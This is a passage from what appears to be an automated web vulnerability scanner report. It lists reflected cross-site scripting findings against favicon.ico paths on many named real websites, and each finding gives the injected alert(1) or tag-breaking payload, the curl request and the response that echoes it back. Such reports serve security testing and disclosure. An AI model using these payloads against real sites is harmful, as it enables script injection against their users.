Expires: Thu, 31 Mar 2011 21:05:07 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app2v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56363
Date: Thu, 31 Mar 2011 21:00:07 GMT
X-Varnish: 1145605345
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy2v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 02-23-11, 18:23:08 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<scr'+'ipt language="JavaScript" src="http://n4403ad.doubleclick.net/adj/gn.cr.craveonline.com/favicon.icoa53bb'-alert(1)-'6c32132cf1e;sect=favicon.icoa53bb'-alert(1)-'6c32132cf1e;ct=favicon.icoa53bb'-alert(1)-'6c32132cf1e;ci=;sz=1000x1000;tile='+(gnm_tile++)+';ord=' + gnm_ord + '?">
...[SNIP]...

1.30. http://www.craveonline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 52dde--><a>6f9f1e27a7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico52dde--><a>6f9f1e27a7d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Thu, 31 Mar 2011 21:05:09 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56219
Date: Thu, 31 Mar 2011 21:00:10 GMT
X-Varnish: 1145605573
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy2v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 02-23-11, 18:23:08 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<!-- BEGIN GN Ad Tag for Craveonline 1000x1000 favicon.ico52dde--><a>6f9f1e27a7d -->
...[SNIP]...

1.31. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79676"-alert(1)-"1eb60a3090f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /79676"-alert(1)-"1eb60a3090f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Thu, 31 Mar 2011 20:12:14 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Fri, 01 Apr 2011 20:12:15 GMT
Date: Thu, 31 Mar 2011 20:12:15 GMT
Content-Length: 21465
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/79676"-alert(1)-"1eb60a3090f";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

1.32. http://www.derkeiler.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.derkeiler.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72686"><a>058f96401a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico72686"><a>058f96401a4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.derkeiler.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 31 Mar 2011 21:54:25 GMT
Last-Modified: Wed, 06 Jul 2005 17:54:02 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6590

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a href="http://www.derkeiler.com/favicon.ico72686"><a>058f96401a4/">
...[SNIP]...

1.33. http://www.derkeiler.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.derkeiler.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 829b3<a>3c43004e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico829b3<a>3c43004e9c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.derkeiler.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 31 Mar 2011 21:54:31 GMT
Last-Modified: Wed, 06 Jul 2005 17:54:02 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6584

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a>3c43004e9c/">favicon.ico829b3<a>3c43004e9c</a>
...[SNIP]...

1.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c349'-alert(1)-'7f4d161b00a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4c349'-alert(1)-'7f4d161b00a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: user_guid=d1e24b62-81ef-4365-b383-af507707bc87; expires=Wed, 31-Mar-2021 20:13:24 GMT; path=/
Set-Cookie: first_time=1; domain=docstoc.com; path=/
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: session.docstoc=6c61bf36-d081-4425-9fcf-b64dabc94f51; path=/
Set-Cookie: memguid.docstoc=cc8edaec-d784-46cd-97a3-cf53c0f7ba60; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: fingerprint.docstoc={"FingerprintId":"","DMA":"","City":"","Region":"","Country":"","Fonts":"","Plugins":"","UserAgent":"","IpAddress":"","Resolution":""}; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: pages_visited=1; path=/
Set-Cookie: general=showTopIE9=1,1,4/1/2011 1:13:24 PM; domain=docstoc.com; expires=Sat, 31-Mar-2012 20:13:24 GMT; path=/
Set-Cookie: cartItemCount=0; expires=Sat, 30-Apr-2011 20:13:24 GMT; path=/
serverID: www2
Date: Thu, 31 Mar 2011 20:13:23 GMT
Content-Length: 15426


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
insertBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2ffavicon.ico4c349'-alert(1)-'7f4d161b00a';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...

1.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f73f<a>07b3868c9eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9f73f<a>07b3868c9eb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.domaintools.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Thu, 31 Mar 2011 21:24:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 20:24:53 GMT
Content-Length: 11939
Connection: close
Set-Cookie: dtsession=94e5b3b9ef0dc69878440525a651c731; expires=Sun, 28 Mar 2021 20:24:53 GMT; path=/; domain=.domaintools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>07b3868c9eb">Whois record for "9f73f<a>07b3868c9eb"</a>
...[SNIP]...

1.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539a1"-alert(1)-"e7f74d1630a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico539a1"-alert(1)-"e7f74d1630a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.driverside.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:31:15 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SelectedCarID=deleted; expires=Wed, 31-Mar-2010 20:31:14 GMT; path=/
Set-Cookie: SelectedTrimID=deleted; expires=Wed, 31-Mar-2010 20:31:14 GMT; path=/
Set-Cookie: SelectedStyleID=deleted; expires=Wed, 31-Mar-2010 20:31:14 GMT; path=/
Set-Cookie: TplType=1; expires=Sat, 07-May-2011 08:31:15 GMT; path=/
Set-Cookie: Ds_client=fc9302a20294e5549522eb2a4701560b; expires=Sun, 28-Mar-2021 20:31:15 GMT; path=/
Set-Cookie: UUID=DS-d52d849d-a074-f2cf-52a8-78d0c30a5f26; expires=Sun, 28-Mar-2021 20:31:15 GMT; path=/
Set-Cookie: business_id=deleted; expires=Wed, 31-Mar-2010 20:31:14 GMT; path=/
Set-Cookie: partner_id=deleted; expires=Wed, 31-Mar-2010 20:31:14 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
<!--

/* Copyright 1997-2004 Omniture, Inc. */
s.prop1="DS";
s.prop2="Thu";
s.prop3="13";
s.prop7="/favicon.ico539a1"-alert(1)-"e7f74d1630a";
s.prop15="unregistered";
s.prop16="logged out";
s.prop17="non-member";
s.eVar1="DS";
s.eVar12="Thu";
s.eVar13="13";
s.eVar15="unregistered";
s.eVar16="logged out";
s.eVar17="non-member";
s.zip=""
/*
...[SNIP]...

1.37. http://www.dummies.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dummies.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeee8<script>alert(1)</script>c6239eb935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoaeee8<script>alert(1)</script>c6239eb935 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dummies.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 21:04:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=AAE466873C03D3424C84A61B009FE948; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<i>/WileyCDA//favicon.icoaeee8<script>alert(1)</script>c6239eb935</i>
...[SNIP]...

1.38. http://www.ecnext.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecnext.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06a3"><script>alert(1)</script>1184b6c85af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob06a3"><script>alert(1)</script>1184b6c85af HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ecnext.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 31 Mar 2011 21:04:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Set-Cookie: tcc=one; path=/
Content-Length: 2535
X-Varnish: 3103012622
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 - Access Denied</title>

...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/favicon.icob06a3"><script>alert(1)</script>1184b6c85af at Thu Mar 31 17:04:24 2011 from 173.193.214.243">
...[SNIP]...

1.39. http://www.ecnext.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecnext.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb61f<script>alert(1)</script>d290fbfbec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofb61f<script>alert(1)</script>d290fbfbec1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ecnext.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 31 Mar 2011 21:04:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Set-Cookie: tcc=one; path=/
Content-Length: 2531
X-Varnish: 2350533837
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 - Access Denied</title>

...[SNIP]...
<br>
Access Denied: http://www.ecnext.com/favicon.icofb61f<script>alert(1)</script>d290fbfbec1 at Thu Mar 31 17:04:24 2011 from 173.193.214.243<br>
...[SNIP]...

1.40. http://www.ecnext.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecnext.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f6be0<script>alert(1)</script>eda0e6a2db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?f6be0<script>alert(1)</script>eda0e6a2db0=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ecnext.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 31 Mar 2011 21:04:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Set-Cookie: tcc=one; path=/
Content-Length: 2537
X-Varnish: 1282767942
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 - Access Denied</title>

...[SNIP]...
<br>
Access Denied: http://www.ecnext.com/favicon.ico?f6be0<script>alert(1)</script>eda0e6a2db0=1 at Thu Mar 31 17:04:23 2011 from 173.193.214.243<br>
...[SNIP]...

1.41. http://www.ecnext.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecnext.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52049"><script>alert(1)</script>dba38377c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?52049"><script>alert(1)</script>dba38377c16=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ecnext.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 31 Mar 2011 21:04:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Set-Cookie: tcc=one; path=/
Content-Length: 2541
X-Varnish: 2350533743
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 - Access Denied</title>

...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/favicon.ico?52049"><script>alert(1)</script>dba38377c16=1 at Thu Mar 31 17:04:23 2011 from 173.193.214.243">
...[SNIP]...

1.42. http://www.education.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.education.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68ef7"%3b39b7c30645e was submitted in the REST URL parameter 1. This input was echoed as 68ef7";39b7c30645e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico68ef7"%3b39b7c30645e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.education.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 31 Mar 2011 20:16:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: e=68c4nh69d2614spa2ern9g2kv4; expires=Fri, 01-Apr-2011 06:16:11 GMT; path=/; domain=www.education.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: i=0; expires=Sun, 12-Jun-2011 20:16:11 GMT; path=/
Content-Length: 141503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <meta http-equiv="co
...[SNIP]...
<!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource";
s.pageType="errorPage";
if(!s.channel) s.channel="favicon.ico68ef7";39b7c30645e";
s.prop5=Cookie.get('registered');
s.prop6=0;
s.prop7='organic';
s.eVar15='organic';
s.prop13='Home Page';
s.prop17='none';
s.campaign='';
s.prop18='web00';
if(Cookie.read&&Cookie.read('sevent', {pat
...[SNIP]...

1.43. http://www.egotastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ad0"><a>00913a37cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico13ad0"><a>00913a37cfb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:23:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input type="hidden" name="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO13AD0"><A>00913A37CFBEDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO13AD0">
...[SNIP]...

1.44. http://www.egotastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58588<script>alert(1)</script>fbf14ed29b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico58588<script>alert(1)</script>fbf14ed29b2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:23:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://www.egotastic.com/favicon.ico58588<script>alert(1)</script>fbf14ed29b2" seems to be missing.</p>
...[SNIP]...

1.45. http://www.elyrics.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e21c8<script>alert(1)</script>31495f85061 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe21c8<script>alert(1)</script>31495f85061 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:17:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1173
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
   <a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/favicon.icoe21c8<script>alert(1)</script>31495f85061</font>
...[SNIP]...

1.46. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 800fa<script>alert(1)</script>f2eb3a906fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

